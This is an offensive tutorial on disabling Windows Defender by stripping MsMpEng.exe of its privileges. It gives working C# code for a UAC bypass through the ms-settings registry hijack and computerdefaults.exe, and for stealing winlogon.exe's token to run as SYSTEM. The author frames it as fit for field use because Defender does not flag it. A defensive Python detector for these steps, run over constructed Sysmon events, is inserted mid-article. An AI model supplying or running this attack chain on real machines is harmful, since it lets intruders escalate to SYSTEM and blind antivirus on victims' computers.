Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)
Let's start, as expected, with some tedious theory. Without it, what happens later will not make sense, so I will keep it as short and plain as I can.
Privileges are permissions that the system grants to a process through its access token. For example, if a process's token holds "SeShutdownPrivilege", the process has the right to shut down your computer. If your program does not hold this privilege, it cannot perform that action.
Windows Defender uses its privileges to check files, for example "SeRestorePrivilege". From this we conclude that if you strip the antivirus process of the privileges it needs to check files, it becomes useless and can no longer perform that check. Any explanation becomes clearer when it is turned from dry text into something you can see, so I suggest you download Process Hacker and look with your own eyes at the privileges held by a particular process.
Windows Defender's engine runs as the process MsMpEng.exe. Find it in the list and open the Tokens tab. Here we notice that the process holds many different privileges that are essential to it.
As you understand, we will deal with disabling these privileges. This concludes the theoretical part, and we begin to implement the POC.
At the very start we are already faced with two problems.
Well, let's start building it.
The essence is that the system application computerdefaults.exe, at startup, reads the registry at the path "Software\Classes\ms-settings\shell\open\command". Our task is to point this key at our own application. Now when computerdefaults.exe starts, our application is opened instead, but with administrator rights. We edit the registry and then launch computerdefaults.exe via cmd.
string execPath = Assembly.GetEntryAssembly().Location; // path of our own executable
// Register our executable as the handler in the ms-settings key under HKCU
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command");
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("", execPath, RegistryValueKind.String);
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
Registry.CurrentUser.Close();
// Launch computerdefaults.exe through a hidden cmd window
Process process = new System.Diagnostics.Process();
ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/C computerdefaults.exe";
process.StartInfo = startInfo;
process.Start();
Actually, at this stage we have already started our process on behalf of the administrator, without any prompt or UAC shield icon.
As already mentioned, the Windows Defender process runs on behalf of NT AUTHORITY\SYSTEM.
We, being a normal process, cannot edit a process running on behalf of the system. We need to elevate!
We will do this through a duplicated token of winlogon.exe. Pay attention to the picture; it shows the full sequence of actions.
In a nutshell: Windows has a process called winlogon, which runs as SYSTEM and is responsible for user logon. We duplicate the token of this process and run our own program with the stolen token.
string procTostart = Assembly.GetEntryAssembly().Location; // our own executable
Process process = Process.GetProcessesByName("winlogon")[0]; // locate winlogon.exe
IntPtr procHandle = process.Handle;
IntPtr tokenHandle = IntPtr.Zero;
WinApi.OpenProcessToken(procHandle, 0x0002, out tokenHandle); // open its token
WinApi.STARTUPINFO SINFO = new WinApi.STARTUPINFO();
SINFO.dwFlags = 1;
SINFO.wShowWindow = 1;
WinApi.PROCESS_INFORMATION PINFO;
WinApi.SECURITY_ATTRIBUTES SECA = new WinApi.SECURITY_ATTRIBUTES();
IntPtr doubleDuplicateToken = IntPtr.Zero;
// Duplicate it as a primary token
WinApi.DuplicateTokenEx(tokenHandle, 0x2000000, ref SECA, 2, WinApi.TOKEN_TYPE.TokenPrimary, out doubleDuplicateToken);
// Start our executable with the duplicated token
WinApi.CreateProcessWithTokenW(doubleDuplicateToken, WinApi.LogonFlags.NetCredentialsOnly, null, procTostart, WinApi.CreationFlags.DefaultErrorMode, IntPtr.Zero, null, ref SINFO, out PINFO);
We have forced our program to run on behalf of SYSTEM, bypassing UAC along the way.
Let's see what happened in a real test.
As you can see in the demonstration, the initial process is started without administrator rights.
At this point we have met all the conditions for editing the privileges of the system process and are ready to implement disabling Windows Defender.
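From the defender's side, both steps above leave traces that an endpoint sensor can see: the registry write to the ms-settings shell\open\command key, and a handle opened to winlogon.exe by an image that has no business touching it. The following detector is an added example, not code from the article; it runs over a small list of constructed Sysmon-style events (dicts whose field names follow Sysmon's Event ID 13 RegistryEvent and Event ID 10 ProcessAccess schemas) rather than a live event log, and the allowlist of images that may legitimately open winlogon.exe is an assumption to be tuned per environment.

```python
"""Detect the ms-settings handler hijack and winlogon.exe token access
described in the article, over constructed Sysmon-style events.
Added example; field names and sample values are assumptions."""

import re

# Tail of the registry path abused by the computerdefaults.exe hijack.
# Sysmon renders HKCU under HKU\<user SID>\..., so match the tail only.
MS_SETTINGS_CMD = re.compile(
    r"\\Software\\Classes\\ms-settings\\shell\\open\\command(\\|$)",
    re.IGNORECASE,
)

# Images that may legitimately open handles to winlogon.exe.
# Constructed allowlist for this example; tune it for your hosts.
WINLOGON_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed sample events (Sysmon EventID 13 = value set, 10 = process access).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\poc.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\Users\bob\AppData\Local\Temp\poc.exe"},
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\poc.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\poc.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe", "GrantedAccess": "0x1400"},
]


def check_registry_event(event):
    """Flag any value written under the ms-settings shell\\open\\command key."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    if not MS_SETTINGS_CMD.search(target):
        return None
    value_name = target.rsplit("\\", 1)[-1]
    if value_name.lower() == "delegateexecute":
        detail = "DelegateExecute value set"
    else:
        detail = "default command set to %s" % event.get("Details")
    return {"rule": "ms-settings-command-hijack",
            "image": event.get("Image"), "target": target, "detail": detail}


def check_process_access_event(event):
    """Flag a handle to winlogon.exe opened by an image outside the allowlist."""
    if event.get("EventID") != 10:
        return None
    target = event.get("TargetImage", "")
    if not target.lower().endswith(r"\winlogon.exe"):
        return None
    source = event.get("SourceImage", "")
    if source.lower() in WINLOGON_ACCESS_ALLOWLIST:
        return None
    return {"rule": "winlogon-handle-from-unexpected-image",
            "image": source, "target": target,
            "detail": "GrantedAccess=%s" % event.get("GrantedAccess")}


def scan(events):
    """Run every check over every event and collect the findings in order."""
    findings = []
    for event in events:
        for check in (check_registry_event, check_process_access_event):
            finding = check(event)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("%-40s %s -> %s" % (finding["rule"], finding["image"], finding["detail"]))
```

The registry rule keys on the path rather than on any particular value, since a clean system has no reason for a user-hive ms-settings handler to exist at all; the process-access rule is deliberately noisy and relies on the allowlist, so in practice it is best paired with the GrantedAccess mask and the parent-process lineage of the source image.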
Let's go back to the theoretical chapter of the article for a second and remember why we actually made all these upgrades. Our task is to deprive the antivirus process of the privileges that let it check files for malware. There are two ways to solve this problem: remove the entire list of privileges manually, or set the Integrity Level to "Untrusted".
During testing it turned out that both solutions are interchangeable and lead to the same result. Therefore we will take the path of least resistance and set the Integrity Level to "Untrusted".
Actually, the sequence of actions is as follows:
The SID value of "ML_UNTRUSTED" can be found in the Microsoft documentation, at the link.
Actually, this is the end of all the actions that we needed to do to remove privileges from the process.
The version of Windows Defender used is the most current at the time of writing.
So, let's ask ourselves the rhetorical question “What the fuck did I do that for?"
The disadvantages of this idea:
After carefully rereading the entire list of pros and cons, I come to the conclusion that this method has every chance of being used in the field.
Its main advantage is that Defender itself does not flag the method, so it is not removed as soon as it lands on the system.
In Silent.exe UAC bypass is not used, so you need to run it as an administrator.
This article is for informational purposes only. We do not encourage you to commit any hacking. Everything you do is your responsibility.
TOX : 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72 Telegram : @DevSecAS